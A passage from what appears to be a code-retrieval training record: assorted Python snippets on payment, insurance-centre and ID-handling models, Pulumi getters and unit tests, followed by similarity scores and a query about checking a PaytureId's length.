cash_payment=None,\r\n show_in_easy_bimeh=None,\r\n installments_payment=None,\r\n is_initial_applicant=None,\r\n branchs_count=None,\r\n employees_count=None,\r\n white_label=None,\r\n phone=None,\r\n fax=None,\r\n address=None,\r\n zip_code=None,\r\n email=None,\r\n web_site=None,\r\n latitude=None,\r\n longitude=None,\r\n is_active=None,\r\n province_id=None,\r\n city_name=None,\r\n meta_media_activity_licence_id=None,\r\n create_on_persian_date=None,\r\n insurance_company_id=None,\r\n active_package_id=None,\r\n package_activation_last_date=None,\r\n online_payment=None,\r\n card_to_card_payment=None,\r\n bank_transfer_payment=None,\r\n cash_on_delivery=None,\r\n bank_transfer_same_online_payment_info=None,\r\n bank_param_id=None,\r\n account_owner=None,\r\n account_number=None,\r\n iban=None,\r\n card_bank_param_id=None,\r\n card_account_owner=None,\r\n card_account_number=None,\r\n bank_transfer_param_id=None,\r\n bank_transfer_account_owner=None,\r\n bank_transfer_account_number=None,\r\n bank_transfer_iban=None,\r\n branch_count=None,\r\n zone_id=None,\r\n sms_charging_stock=None,\r\n independent_branch=None,\r\n disable_reason=None,\r\n terms_conditions=None,\r\n disable_reason_description=None,\r\n unlimited_account=None,\r\n payment_url=None,\r\n 
callback_url=None,\r\n callback_url_whitelabel=None,\r\n insurance_centre_id=None,\r\n city_region_id=None,\r\n meta_media_activity_licence_url=None,\r\n license_api_key=None,\r\n verify_request_url=None):\r\n\r\n # Initialize members of the class\r\n self.id = id\r\n self.person_id = person_id\r\n self.personality_type = personality_type\r\n self.insurance_centre_type = insurance_centre_type\r\n self.register_status = register_status\r\n self.center_name = center_name\r\n self.center_code = center_code\r\n self.branch_count = branch_count\r\n self.registration_number = registration_number\r\n self.free_use_golden_pack_expire_date = free_use_golden_pack_expire_date\r\n self.city_id = city_id\r\n self.cash_payment = cash_payment\r\n self.show_in_easy_bimeh = show_in_easy_bimeh\r\n self.installments_payment = installments_payment\r\n self.is_initial_applicant = is_initial_applicant\r\n self.branchs_count = branchs_count\r\n self.employees_count = employees_count\r\n self.zone_id = zone_id\r\n self.sms_charging_stock = sms_charging_stock\r\n self.independent_branch = independent_branch\r\n self.disable_reason = disable_reason\r\n self.terms_conditions = terms_conditions\r\n self.disable_reason_description = disable_reason_description\r\n self.unlimited_account = unlimited_account\r\n self.white_label = white_label\r\n self.phone = phone\r\n self.fax = fax\r\n self.address = address\r\n self.zip_code = zip_code\r\n self.email = email\r\n self.payment_url = payment_url\r\n self.callback_url = callback_url\r\n self.callback_url_whitelabel = callback_url_whitelabel\r\n self.web_site = web_site\r\n self.latitude = latitude\r\n self.longitude = longitude\r\n self.is_active = is_active\r\n self.insurance_centre_id = insurance_centre_id\r\n self.city_region_id = city_region_id\r\n self.province_id = province_id\r\n self.city_name = city_name\r\n self.meta_media_activity_licence_id = meta_media_activity_licence_id\r\n self.meta_media_activity_licence_url = meta_media_activity_licence_url\r\n self.create_on_persian_date = create_on_persian_date\r\n self.insurance_company_id = insurance_company_id\r\n self.active_package_id = active_package_id\r\n self.package_activation_last_date = package_activation_last_date\r\n self.license_api_key = license_api_key\r\n self.verify_request_url = verify_request_url\r\n self.online_payment = online_payment\r\n self.card_to_card_payment = card_to_card_payment\r\n self.bank_transfer_payment = bank_transfer_payment\r\n self.cash_on_delivery = cash_on_delivery\r\n self.bank_transfer_same_online_payment_info = bank_transfer_same_online_payment_info\r\n self.bank_param_id = bank_param_id\r\n self.account_owner = account_owner\r\n self.account_number = account_number\r\n self.iban = iban\r\n self.card_bank_param_id = card_bank_param_id\r\n self.card_account_owner = card_account_owner\r\n self.card_account_number = card_account_number\r\n self.bank_transfer_param_id = bank_transfer_param_id\r\n self.bank_transfer_account_owner = bank_transfer_account_owner\r\n self.bank_transfer_account_number = bank_transfer_account_number\r\n self.bank_transfer_iban = bank_transfer_iban", "def party_id(self):\n pass", "def test_validate_party_info_id_is_none(self):\n self.party_test_data[\"id\"] = None\n response = validate_party_info(self.party_test_data)\n self.assertDictEqual(\n response, {\"message\": \"id is required\", \"code\": 400})", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> 
Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def __init__(self, payment_id, camper_id = '', camp_id = '', payment_date = '', paid_amount = ''):\r\n self.__payment_id__ = payment_id\r\n self.__camper_id__ = camper_id\r\n self.__camp_id__ = camp_id\r\n self.__payment_date__ = payment_date\r\n self.__paid_amount__ = paid_amount", "def unique_id(self):\r\n return f\"{DOMAIN}_{self.charge_point_id}_{self.connector_id}\"", "def emptyGroupementPk(heb):\n heb.heb_groupement_pk = None\n heb.update()", "def unique_id(self) -> str:\n return f\"{self.wallet_id}{self.WALLET_KEY_POSTFIX}\"", "def _set_unique_id(self, json_request):\n values = []\n for field in value_fields:\n value = json_request.get(field, '')\n values.append(quote(self.fully_decode_uri(value), safe=''))\n if len(values) == 1:\n self.unique_id = values[0]\n elif len(values) == 2:\n self.unique_id = self.build_summary(values[0], values[1])\n elif len(values) == 1:\n self.unique_id = 
self.build_summary(values[0], values[1], values[2])", "def __unicode__(self):\r\n return \"%d (%f)\" % (self.payment.pay_id, self.id)", "def get_dummy_id(self):\n return self._dummy_id", "def unique_id(self) -> str | None:\n return f\"{self._station_id}_{self._fuel_type}\"", "def null(cls):\n return GXBIGRID()", "def __init__(self, payor_id=None, payor_name=None, address=None, primary_contact_name=None, primary_contact_phone=None, primary_contact_email=None, funding_account_routing_number=None, funding_account_account_number=None, funding_account_account_name=None, kyc_state=None, manual_lockout=None, payee_grace_period_processing_enabled=None, payee_grace_period_days=None, collective_alias=None, support_contact=None, dba_name=None, allows_language_choice=None, reminder_emails_opt_out=None, language=None, includes_reports=None, max_master_payor_admins=None, transmission_types=None): # noqa: E501 # noqa: E501\n\n self._payor_id = None\n self._payor_name = None\n self._address = None\n self._primary_contact_name = None\n self._primary_contact_phone = None\n self._primary_contact_email = None\n self._funding_account_routing_number = None\n self._funding_account_account_number = None\n self._funding_account_account_name = None\n self._kyc_state = None\n self._manual_lockout = None\n self._payee_grace_period_processing_enabled = None\n self._payee_grace_period_days = None\n self._collective_alias = None\n self._support_contact = None\n self._dba_name = None\n self._allows_language_choice = None\n self._reminder_emails_opt_out = None\n self._language = None\n self._includes_reports = None\n self._max_master_payor_admins = None\n self._transmission_types = None\n self.discriminator = None\n\n if payor_id is not None:\n self.payor_id = payor_id\n self.payor_name = payor_name\n if address is not None:\n self.address = address\n if primary_contact_name is not None:\n self.primary_contact_name = primary_contact_name\n if primary_contact_phone is not None:\n self.primary_contact_phone = primary_contact_phone\n if primary_contact_email is not None:\n self.primary_contact_email = primary_contact_email\n if funding_account_routing_number is not None:\n self.funding_account_routing_number = funding_account_routing_number\n if funding_account_account_number is not None:\n self.funding_account_account_number = funding_account_account_number\n if funding_account_account_name is not None:\n self.funding_account_account_name = funding_account_account_name\n if kyc_state is not None:\n self.kyc_state = kyc_state\n if manual_lockout is not None:\n self.manual_lockout = manual_lockout\n if payee_grace_period_processing_enabled is not None:\n self.payee_grace_period_processing_enabled = payee_grace_period_processing_enabled\n if payee_grace_period_days is not None:\n self.payee_grace_period_days = payee_grace_period_days\n if collective_alias is not None:\n self.collective_alias = collective_alias\n if support_contact is not None:\n self.support_contact = support_contact\n if dba_name is not None:\n self.dba_name = dba_name\n if allows_language_choice is not None:\n self.allows_language_choice = allows_language_choice\n if reminder_emails_opt_out is not None:\n self.reminder_emails_opt_out = reminder_emails_opt_out\n if language is not None:\n self.language = language\n if includes_reports is not None:\n self.includes_reports = includes_reports\n if max_master_payor_admins is not None:\n self.max_master_payor_admins = max_master_payor_admins\n if transmission_types is not None:\n self.transmission_types = 
transmission_types", "def test_id_no_value(self):\n self.line._parse_event_swimmer_id(\" \")\n self.assertEqual(None, self.line.event_swimmer_id)", "def _generate_uuid_str_if_none(given_uuid):\n\t\treturn given_uuid or uuid.uuid4().__str__()", "def _prepare_invoice(self):\n self.ensure_one()\n result = super(SaleOrder, self)._prepare_invoice()\n result.update({\n 'cost_center_id': self.cost_center_id and self.cost_center_id.id or False\n })\n return result", "def get_id(self) -> Optional[str]:\n return self.id_", "def payor_id(self, payor_id):\n\n self._payor_id = payor_id", "def test_id_type_none(self):\n obj = Base(None)\n self.assertTrue(obj.id is 1)", "def testIdReturn(self):\n self.assertEqual(\n 'uniqueId',\n self.cc.id\n )", "def reqid(self) -> str:", "def reqid(self) -> str:", "def test_id_no_value(self):\n self.line._parse_team_swimmer_id(\" \")\n self.assertEqual(None, self.line.team_swimmer_id)", "def unique_id(self):\n return f\"octopus_energy_intelligent_charge_limit\"", "def _default_value(self):\n return None", "def id(self) -> Optional[str]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[str]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[str]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[str]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[str]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[str]:\n return pulumi.get(self, \"id\")", "def test_pay_for_nothing(self):\n res = self.do_get_basket()\n self.assertEqual(res.status_code, 200)\n basket_id = res.data['id']\n\n data = {\n \"guest_email\": \"herp@example.com\",\n \"basket\": reverse('basket-detail', args=[basket_id]),\n \"shipping_address\": {\n \"first_name\": \"fadsf\",\n \"last_name\": \"fad\",\n \"line1\": \"234 5th Ave\",\n \"line4\": \"Manhattan\",\n \"postcode\": \"10001\",\n \"state\": \"NY\",\n \"country\": reverse('country-detail', args=['US']),\n \"phone_number\": \"+1 (717) 467-1111\",\n }\n }\n url = reverse('cybersource-sign-auth-request')\n res = self.client.post(url, data, format='json')\n self.assertEqual(res.status_code, 406)", "def unique_id(self) -> str:\n return self.get_unique_id(wallet=self.wallet_id, nonce=self.nonce)", "def generated_data_id(self) -> Optional[str]:\n return self._generated_data_id", "def compute_transaction_id(self):\n self.tx_id = self.get_sign_data()", "def get_unique_id(cls, wallet: str, nonce: Optional[str]) -> str:\n if nonce:\n return f\"{wallet}_{nonce}{cls.TRANSACTION_KEY_POSTFIX}\"\n else:\n return f\"{wallet}{cls.TRANSACTION_KEY_POSTFIX}\"", "def test_uuid_default(self):\r\n default = uuid.uuid4()\r\n prop = UUID(default=default, required=True)\r\n self.assertEqual(prop.to_database(None), prop.to_database(default))", "def test_missingId(self):\n node = Node()\n node.properties[\"datawire_nodeId\"] = \"4567\"\n self.assertEqual(node.getId(), \"4567\")", "def test_post_cve_id_no_params(reg_user_headers):\n res = requests.post(\n f'{env.AWG_BASE_URL}{CVE_ID_URL}',\n headers=reg_user_headers\n )\n assert res.status_code == 400\n response_contains(res, 'amount')\n response_contains(res, 'cve_year')\n response_contains(res, 'short_name')", "def onchange_invoice_id(self):\n # self.invoice_id = False\n # self.base_amount = 0.0\n # self.wh_src_rate = 5.0\n if self._context is None:\n context = {}\n res = {}\n inv_obj = self.env['account.invoice']\n if not self.invoice_id:\n return {'value': {\n 'invoice_id': False,\n 'base_amount': 0.0,\n 'wh_src_rate': 0.0,\n 'wh_amount': 0.0, }\n }\n\n inv_brw = 
inv_obj.browse(self.invoice_id.id)\n base_amount = self.base_amount or inv_brw.amount_untaxed\n wh_src_rate = self.wh_src_rate or inv_brw.wh_src_rate or 5.0\n wh_amount = base_amount * wh_src_rate / 100.0\n res = {'value': {\n 'base_amount': base_amount,\n 'wh_src_rate': wh_src_rate,\n 'wh_amount': wh_amount,\n }\n }\n return res", "def fill_missing_parameters(self):\n pseudo_id = self.get_param_by_type(PseudoID)\n pseudo_name = self.get_param_by_type(PseudoName)\n if pseudo_id is None and pseudo_name is not None:\n self.parameters.append(\n PseudoID(pseudo_name.value)\n ) # take name for both\n elif pseudo_name is None and pseudo_id is not None:\n self.parameters.append(\n PseudoName(pseudo_id.value)\n ) # take id for both", "def pure_id(self):\n return self._pure_id", "def test_serialize_none(self):\n self.assertEqual(serialize(None), 'null')", "def add_default_params(self, params):\n params['key'] = self.key\n params['format'] = self.format\n #params['unique_id'] = generate_unique_id()\n return params", "def unique_id(self):\n return f\"octopus_energy_gas_{self._serial_number}_{self._mprn}_previous_accumulative_cost_override_tariff\"", "def get_primary_id(self):", "def get_prep_value(self, value):\n if (value is UNKNOWN) or (value is ''):\n # If Django tries to save an empty string, send the db None (NULL).\n return None\n else:\n # Otherwise, just pass the value.\n return value", "def unique_id(self) -> Optional[str]:\n return self._device.device_id", "def get_or_create_unique_id(self):\n if not self.unique_id:\n self.unique_id = uuid.uuid4().hex\n return self.unique_id", "def identity_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"identity_id\")", "def identity_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"identity_id\")", "def id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"id\")" ]
[ "0.5814802", "0.57321626", "0.5561772", "0.54671985", "0.5423538", "0.5402264", "0.5338469", "0.5287139", "0.5287139", "0.5287139", "0.5248321", "0.5226516", "0.5212841", "0.514347", "0.512409", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.50907475", "0.5085691", "0.50814104", "0.5066625", "0.50645024", "0.50641996", "0.50521195", "0.50521076", "0.5001981", "0.49948782", "0.4993409", "0.4986245", "0.4971573", "0.49589494", "0.49538484", "0.4949099", "0.49467346", "0.49392086", "0.49392086", "0.49390846", "0.49321082", "0.49203447", "0.4892771", "0.4892771", "0.4892771", "0.4892771", "0.4892771", "0.4892771", "0.4881849", "0.48815697", "0.48766047", "0.48673418", "0.4865086", "0.48466253", "0.4836276", "0.48348296", "0.4833271", "0.48303524", "0.48281577", "0.48223674", "0.48144472", "0.48110402", "0.48003095", "0.4799207", "0.47953835", "0.47943953", "0.47870758", "0.47870758", "0.4784037", "0.4784037", "0.4784037", "0.4784037", "0.4784037", "0.4784037", "0.4784037", "0.4784037", "0.4784037", "0.4784037" ]
0.0
-1
Check length of PaytureId (len = 50)
def test_42(self): assert 'True' == Api.requestBlock('test-42')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def validateID(id):\n\n if re.compile('[0-9]+').match(id) == None:\n output.completeOutputError(InvalidArgumentCount(descape =\"'%s' is not a valid Id. ID should be numeric with Length = '%s' \" \n\t\t\t% (id, lib.constants._ATTR_ID_LENGHT)))\n return -1\n else:\n # Check for the lenght \n counter = 0\n for char in id:\n counter += 1\n print counter , lib.constants._ATTR_ID_LENGHT\n if counter > lib.constants._ATTR_ID_LENGHT :\n output.completeOutputError(InvalidArgumentCount(descape =\"'%s' exceeded the given length i.e Max Length = '%s'\" % \n\t\t\t(id, lib.constants._ATTR_ID_LENGHT)))\n return -1\n else:\n return 0\n return 0", "def test_get_shortuuid_specific_length(self):\n id = get_shortuuid(length=10)\n self.assertTrue(len(id) == 10)", "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def validate_uuid(self, uuid_to_check):\r\n if re.fullmatch(BASE62_REGEX, uuid_to_check):\r\n return 20 <= len(uuid_to_check) <= 22\r\n else:\r\n return False", "def checkLength(ish, length):\n if ish == \"Visa\":\n ok = (13,16)\n elif ish == \"American Express\":\n ok = (15,)\n elif ish == \"MasterCard\":\n ok = (16,)\n elif ish == \"Discover/Novus\":\n ok = (16,)\n else:\n raise TypeError, \"unknown issuer\"\n return length in ok", "def payment_id_lengths(self) -> Set[int]:", "def payment_id_leading(self) -> bool:", "def max_length(verifield, required):\n if verifield is None: return True\n return len(verifield) <= required", "def confirm_resdic_chainid_length(params):\n resdic_params = (p for p in params if p.startswith('resdic_'))\n for param in resdic_params:\n chainid = param.split('_')[-1]\n if len(chainid) > 1:\n raise ValueError(\n f\"We found the parameter {param!r} which has \"\n \"more than one character in the chain \"\n \"identifier. Chain IDs should have only one character.\"\n )", "def checkValidId(self, id, prep_id = False):\n # RRD docs say that limit on vnames is 255 characters and that\n # A-Za-z0-9_ are the valid characters. Zenoss reserves - for it's own\n # use. 
Limiting to 200 instead just to leave room for whatever.\n # http://oss.oetiker.ch/rrdtool/doc/rrdgraph_data.en.html\n if len(id) > 200:\n return 'GraphPoint names can not be longer than 200 characters.'\n allowed = set(string.ascii_letters + string.digits + '_')\n attempted = set(id)\n if not attempted.issubset(allowed):\n return 'Only letters, digits and underscores are allowed' + \\\n ' in GraphPoint names.'\n return ZenModelRM.checkValidId(self, id, prep_id)", "def __len__(self):\n return len(self.token2id)", "def LengthTest(arr):\n\tif len(arr) == 8:\n\t\treturn True;\n\telif len(arr) == 7:\n\t\treturn IsMissingField('cid', arr)\n\telse:\n\t\treturn False", "def test_length(self):\n form_data = self.form_data('c897B$eH@')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def check_length(length):\n if length > lengthLimit:\n err_str = \"The length value (%s) is higher than the \" % (length)\n err_str += \"limit length (%s)\" % (lengthLimit)\n raise ValueError(err_str)", "def isValid(t_id):\n\tstr_id=str(t_id).strip()\n\treturn str_id.isdigit()", "def test_length(self):\n for length in range(2, 30):\n self.assertEqual(len(generate_password(length)), length)", "def test_invalid_numeric_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == parameter_is_too_long_msg.format('sender_id')", "def test_valid_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def validate_crx_id(crx_id):\n try:\n assert isinstance(crx_id, str)\n assert crx_id.isalnum()\n assert len(crx_id) == 32\n except AssertionError:\n raise MalformedExtId", "def checkValidId(self, id, prep_id = False):\n new_id = unquote(id)\n if prep_id: new_id = self.prepId(id)\n try:\n globalCheckValidId(self, new_id)\n return True\n except Exception:\n return str(sys.exc_info()[1])", "def is_valid(self):\n if len(self) <= 64 and re.match(RE_VALID_UID, self):\n return True\n\n return False", "def test_get_shortuuid_uuid(self):\n id = get_shortuuid()\n self.assertTrue(len(id) == 22)", "def bad_substring_check_account(self, google_ads_account_id):\n pass", "def test_rfc_nickkey_length(s):\n assert len(util.rfc_nickkey(s)) == len(s)", "def test_valid_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def validateIOmoduleId(output ,arg_dict , key):\n id = arg_dict[key]\n counter = 0\n for char in id:\n counter += 1\n if re.compile('[0-9]+').match(char[0]) == 
None:\n output.completeOutputError(InvalidArgumentCount(descape =\"'%s'='%s' is not a valid Id. \\n ID should be numeric \" % (key,id))) \n return None\n if counter > lib.constants._ATTR_ID_LENGHT:\n output.completeOutputError(InvalidArgumentCount(descape =\"'%s'='%s' is not a valid Id. \\n ID should be numeric with Length = '%s' \" % (key,id, lib.constants._ATTR_ID_LENGHT)))\n return None\n return arg_dict", "def len12(self, len): # -> None:\n ...", "def _check_subject_id(subject_id):\n if (subject_id and\n len(subject_id) > models.Subject.id.property.columns[\n 0].type.length):\n raise exception.SubjectNotFound()", "def vet_pdb_id(pdbid):\n if len(pdbid) < 4 or not \\\n pdbid.isalnum() or not \\\n re.match(r'^[0-9][A-Za-z0-9]{3}$', pdbid):\n return False\n return True", "def test_has_correct_length(self) -> None:\n assert len(list(ccc.CompoundingConversationDataset())) == 131569", "def validateVfabric(output ,arg_dict, key):\n id = arg_dict[key]\n counter = 0\n for char in id:\n counter += 1\n if re.compile('[0-9]+').match(char[0]) == None:\n output.completeOutputError(InvalidArgumentCount(descape =\"'%s' = '%s' is not a valid Id. ID should be numeric \" % \n\t\t\t\t(key,id)))\n return None\n if counter > lib.constants._ATTR_ID_LENGHT:\n\t output.completeOutputError(InvalidArgumentCount(descape =\"'%s'='%s' is not a valid Id. \\n ID should be numeric with Length = '%s' \" % (key,id, lib.constants._ATTR_ID_LENGHT)))\n return None\n return arg_dict", "def check_id(self, id):", "def id_check(employee_id):\r\n# badge_pattern = re.compile('[A-Za-z]{2}-\\d{4}')\r\n# re.search(badge_pattern, employee_id)\r\n\r\n # if statement\r\n if not re.match('[A-Z]{2}-\\d{4}', employee_id):\r\n print(employee_id, 'is not a valid ID.')", "def _validate_bbg_id(x):\n return len(x) == 12 and x[:3] == 'BBG' and str.isalnum(x[3:11]) and sum(map(\n lambda u: u in ['A', 'E', 'I', 'O', 'U'], x[3:11])) == 0 and str.isdigit(x[11])", "def _check_max_length(self, p: list) -> bool:\n\n return (\n len(p[0].split(\" \")) < self.max_length\n and len(p[1].split(\" \")) < self.max_length\n )", "def test_40_phonenumbers_too_long(self):\n number_phone = self.samples[4]\n with self.assertRaises(osv.except_osv):\n self.pn._symbol_set_char(number_phone)", "def test_client_ip_max_length(self):\n request = Request.objects.get(id=1)\n max_length = request._meta.get_field('client_ip').max_length\n self.assertEquals(max_length, 100)", "def check_string_length(string):\n if len(string) > 255:\n sys.exit(\"ERROR: Max permitted string length is 255\")", "def test_client_email_max_length(self):\n request = Request.objects.get(id=1)\n max_length = request._meta.get_field('client_email').max_length\n self.assertEquals(max_length, 100)", "def length_of_name(self, name):\n length = len(name)\n if length > 10:\n self.show_message_when_name_very_long()\n return length", "def generate_id(length: int = 8):\n return \"\".join(random.choices(string.ascii_uppercase, k=length))", "def _validate_length(data, min, max, err): # lint-amnesty, pylint: disable=redefined-builtin\n if len(data) < min or len(data) > max:\n raise errors.AccountDataBadLength(err)", "def checkPacketLength(self):\n return self.packetLength == len(self) - PRIMARY_HEADER_BYTE_SIZE - 1", "def min_length(verifield, required):\n if verifield is None: return True\n return len(verifield) >= required", "def invalid_caterpillar_length(length):\n try:\n length = int(length)\n except ValueError:\n return \"`caterpillar-length` must be something that can be cast to an `int`\"\n\n if not 1 <= 
length <= len(app.desk.indeces):\n return (\n \"`caterpillar-length` must be a number between \"\n f\"1 and {len(app.desk.indeces)}\"\n )\n\n return False", "def simple_validator(passport):\n if len(passport) == 8:\n return True\n if len(passport) == 7 and \"cid\" not in passport:\n return True\n return False", "def validate_kf_id(kf_id, prefix='TA'):\n if len(kf_id) != 11 or kf_id[:3] != prefix+'_':\n abort(400, f\"'{kf_id}' is not a valid kf_id\")", "def is_name_length_valid(self) -> bool:\n return 2 < len(self.app_name) <= 35", "def _validate_length(self, value):\n return (self.maximum_length is None) or (len(value) <= self.maximum_length)", "def _matchLength(self, length: int):\n return self._comparator['Length'] < length", "def test_longest_id(self):\r\n ids = \\\r\n \"R27DLI_4812 R27DLI_600 R27DLI_727 U1PLI_403 U1PLI_8969\".split(\r\n )\r\n seqs = dict(parse_fasta(dna_seqs.splitlines(),\r\n label_to_name=label_to_name))\r\n self.assertEqual(longest_id(ids, seqs), 'U1PLI_403')", "def test_split_id_otp(self):\n public_id, otp, = pyhsm.yubikey.split_id_otp(\"ft\" * 16)\n self.assertEqual(public_id, '')\n self.assertEqual(otp, \"ft\" * 16)\n\n public_id, otp, = pyhsm.yubikey.split_id_otp(\"cc\" + \"ft\" * 16)\n self.assertEqual(public_id, 'cc')\n self.assertEqual(otp, \"ft\" * 16)", "def test_maxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'license_plate': 'AF8934'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': '123456'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF893'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF8-934'}\n self.assertFalse(val.validate(document))\n\n document = {'license_plate': 'AF 934'}\n self.assertFalse(val.validate(document))", "def fill_id(id):\n if len(str(id)) < 7:\n length = len(str(id))\n id = \"0\"*(7 - length) + str(id)\n return str(id)", "def test_has_correct_length(self) -> None:\n assert len(list(ccc.ConversationDataset())) == 7168", "def is_id_valid(id_code: str) -> bool:\n if is_valid_gender_number(int(id_code[0:1])):\n if is_valid_year_number(int(id_code[1:3])):\n if is_valid_month_number(int(id_code[3:5])):\n if is_valid_day_number(int(id_code[0:1]), int(id_code[1:3]), int(id_code[3:5]), int(id_code[5:7])):\n if is_valid_birth_number(int(float(id_code[7:10]))):\n if is_valid_control_number(id_code):\n return True\n else:\n return False\n else:\n return False\n\n else:\n return False\n else:\n return False\n else:\n return False", "def validateId(shortId):\n return shortId in [DockerUtil.getShortId(container) for container in DOCKER_CLIENT.containers.list()]", "def randid(length=12):\n\timport random\n\treturn ''.join(random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for x in range(length))", "def validate_length(string):\n if len(string) > 110:\n raise ValidationError('Tweet must be less than 110 characters')", "def is_id_valid(id_code: str) -> bool:\n if id_code.isdigit():\n if len(str(id_code)) == 11:\n id_code = str(id_code)\n gender_number = int(id_code[0:1])\n day = int(id_code[5:7])\n month = int(id_code[3:5])\n year = id_code[1:3]\n birth_number = id_code[7:10]\n if is_valid_gender_number(gender_number) \\\n and is_valid_year_number(int(year)) \\\n and is_valid_month_number(int(month)) \\\n and is_valid_day_number(gender_number, int(year), int(month), int(day)) \\\n and is_valid_birth_number(int(birth_number)) \\\n and 
